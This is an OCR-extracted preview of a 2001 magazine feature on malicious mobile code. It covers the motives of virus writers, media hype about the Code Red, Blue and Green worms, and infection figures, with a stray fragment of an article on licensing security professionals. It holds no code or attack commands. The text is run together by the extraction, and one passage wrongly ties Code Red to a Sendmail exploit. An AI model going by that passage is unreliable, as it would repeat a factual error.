View
217
Download
3
Category
Preview:
Citation preview
9
feature
Since 1981, technology has changed dra-matically and so have the viruses thatinfect it. Like their biological counter-parts, computer viruses also evolve,mutate and adapt to make more efficientuse of their environment. Anti virus sys-tems, too, have had to evolve in responseto the dynamic environment. This articlewill explore • Reasons why people create malicious
mobile code.• How the media responds.• The high infection rates of malicious
mobile code.
Why do it?‘Love Bug’, ‘Melissa’ and ‘Kournikova’have all worked their way into commonparlance. So why does someone create
them? What does the virus or wormwriter hope to achieve?
There may be a number of differentreasons behind this phenomenon:
RevengeRevenge is a common motive, and per-haps the oldest.
An unhappy ex-employee, former supplier or business partner, or failed jobcandidate feeling their skill was notunderstood or appreciated.
KudosIn certain circles, hacking is consideredan art, and getting your creation on thefront page of almost every online newswebsite will raise you to the level ofdeity.
Within the Virus writing, Hacking,AntiVirus and Security communities, cer-tain names have become as famous (orinfamous) as a pop star.
Names such as Robert T. Morris Jr.(author of the “Morris Worm”) and,more recently, people like David L. Smithand Jan de Wit (authors of the “Melissa”and “Kournikova” viruses respectively).
Because I CanMotivation for writing malicious codecan be the same as for the person whosmashes up cars or loots shops in the mid-dle of a riot, or who throws bricksthrough windows or slashes bus seats.They do it for the thrill, demonstratingtheir power over the law and their abilityto get away with it. This digital vandaldoesn’t care what the results will be, aslong as they are widespread and destruc-tive. If it gets media attention they willhave had their ‘15 minutes of fame’.
AccidentSome viruses are created as ‘Proof ofConcept’ code, a demonstration proto-type, if you will, to test either a theory orsome software. They are created in a labo-ratory in much the same way as a virolo-gist would create cultures of biologicalviruses and bacteria for testing and exam-ination. The virus then accidentally
will be excluded from its provisions. Carewill need to be taken if licensing is mademandatory that, with regard to HumanRights law, nobody is unfairly deprived oftheir chosen career.
In my opinion, it is the issue of fairnessthat is going to be the most difficult toachieve regardless of the model chosen orthe organization running any register.
Finally, we do need to look at what thelegislators are hoping to achieve. Thecynical view is that, focussing on recentincidents, they see a target which is notwell understood by the public (considerthe whole “hacker”, “cracker” debate,)and will allow them to be seen to bedoing something.
A less bitter and twisted view might bethat the importance of secure E-com-
merce to the economies of developedcountries, and the fragility of the publicperception of internet security, meansthat we are now important enough torequire a legislative framework.
We know that there are very few politi-cians who understand the complexities ofInternet technology. We are aware thatmany Internet professionals do not under-stand the complexities of informationsecurity. Is the current position analogousto the 19th Century Indiana attempt toregulate the value of π8 One of the thingsthat seems to be missing in variousattempts to regulate technology (the pro-posed US Security Systems Standards and
Certification Act features large here) is anyconcept or discussion (within the politicalcommunity) of what secondary impactsthe legislation will have.
Any licensing regime would need torecognize international mobility of peo-ple, the wide range of academic and pro-fessional backgrounds within theindustry, and the enormous differences inpersonal, employer and client require-ments. I do not believe that any manda-tory scheme could appropriately andefficiently address all of these issues. Thisleaves public promotion of existing vol-untary schemes, certainly something thatgovernments (with whom companieshave to deal for tax, incorporation andaccounts) are in a good position toattempt.
8 Luckily the Indiana Senate was more reasonablethat the House, and the Bill was shelved.
What We Can Learn AboutMalicious Mobile CodeJ.J. Gray, @stake
Just as graffiti has been around for as long as humans have been capable of writtencommunication, malicious mobile code has existed for as long as humans have mas-tered digital communication. It is only in the last few years that viruses and wormshave become worthy of mainstream media attention. The first notable instance wasthe ‘Apple Virus’ that broke out in 1981. By 1986, one of the first PC based viruses— ‘The Brain’ — had been created.
Nese October.qxd 10/25/01 9:33 AM Page 9
breaks out of the laboratory and into thebig wide world, spreading and infectingas it goes.
OtherSometimes there is no single motivation.It can vary depending on the views of thecommunity the program writer affects orthe interests that they are serving. Theone thing we can say with certainty isthat technology is here to stay and so arethe viruses and worms that infect it.
While we can continue to rail againstthose that create them, perhaps it is moreproductive to simply accept that they willalways exist, evaluate the risks they poseand plan accordingly. Only then can wemove on with life and with business, deny-ing today’s digital vandals the celebrity sta-tus that they seem to have acquired.
Colour coded malware‘Code Red’ is the latest example of thisphenomenon. ‘Code Red’ is a worm.Worms are different from many viruses inthat they do not require direct humanaction to propagate.
“Worms are different fromviruses in that they do not
require direct humanaction to propagate.”
Viruses, on the other hand, need humanaction to spread. This can be done bydownloading an infected program fromthe Internet, or double-clicking thatstrange attachment in the email sent toyou and fifty other people by someone youknow, with the subject line of “Look atthis!” or by some other invitation.
The ‘Code Red’ worm may not be inthe media spotlight anymore, but whatmost people may not realize is that it isstill active on approximately 10% of theoriginally infected machines.
Code Red was modified several timesto create three or four variants.
The current attention is focussed onCode Blue, or even Code Green. CodeBlue is a similar creation though it exploitsa different vulnerability. It does not exploit
anything new — it uses the UnicodeDirectory Traversal exploit that Microsoftsupplied a patch for on 17 October 2000.Its target is also different as it attacks thesite of a Chinese network securityprovider.
Code Green is another worm createdby a German known as ‘Der HexXer’ thatscans the Internet looking for serversinfected with Code Red Version II andthen patches the server before continuingto scan from the new server. Regardlessof intent, it is still self-propagating codethat executes without the knowledge andpermissions of the Web server owners.
By contrast, ‘Code Red’ uses a technique similar to the ‘Morris Worm’that attacked the fledgling Internet in1988, exploiting a known vulnerability ina particular brand of software, Sendmail,to install itself on the compromised hostand then begin further replication.
At first, ‘Code Red’ remained quiescentand did nothing. However, at a synchro-nised time, all the worms actively sentlarge amounts of information to theWhite House official website in anattempt to overwhelm it and preventpeople viewing it in a distributed denial-of-service (DDoS) attack.
Despite the best efforts of CodeRed/Green/Blue or any of the variants,the Internet has not ground to a halt. Infact, Code Blue has had little impact eventhough it is active in the wild.
In August 2001, Netcraft conductedone of its regular surveys of all the web
servers that could identify on the Internetwww.netcraft.com/survey/). It foundnearly 31 million websites of which justover 8 million (26%) were running someform of Microsoft Web server softwareand thus were potentially vulnerable tothe ‘Code Red’ worm.
At the height of the first round of‘Code Red’ activity, it was estimated that250 000 to 300 000 hosts were infected.The second time around, it onlyappeared to be in the order of 100 000.Compared to potential targets of a serverpopulation of 8 million, these are prettysmall numbers.
As for the feared affect on the Internet,if your network happens to be near theworms’ target of the US Presidential web-site, then you may have noticed someslowing of Internet traffic — in much thesame way we have rush hour traffic thesame time each day. But, overall, therehas been no major global impact.
Let’s not forget that the Internet is arobust, global entity that does not recog-nize physical or international borders andis designed to find its way around ‘localdifficulties’.
But why all the recent press attention?Certainly, technology now touchesalmost all our lives as it has done for sometime now. Still, it is hard to imagine, evenfive years ago, that a mere computer viruswould elicit the kind of press reactionthat we have seen the ‘Code Red’ wormand its offspring receive.
Certain sections of the media wouldhave us believe this has been a disaster ofalmost enormous proportions, whippingthe public into a frenzy and making direwarning of the collapse of the Internet.Software vendors have also fuelled the fireby spreading “FUD” — Fear, Uncer-tainty, and Doubt to aggressively markettheir “Silver Bullet” solutions.
While raising awareness is important, itneeds to be handled in a calm and profes-sional manner.
About the authorJ.J Gray is security architect at @stake, adigital security consultancy. Reach him byemail on jj@atstake.com.
feature
10
A worm of any other colour...
Red is still working on 10% of infectedmachines. It sometimes targets the WhiteHouse with a denial-of-service. There aremany versions doing the rounds.
Blue uses a known vulnerability. Sometimes it attacks a security site inChina.
Green scans the Internet for serversinfected with Code Red II. It patches thevulnerability that lets it in.
None of these has even come close tobringing down the Internet.
Nese October.qxd 10/25/01 9:33 AM Page 10
Recommended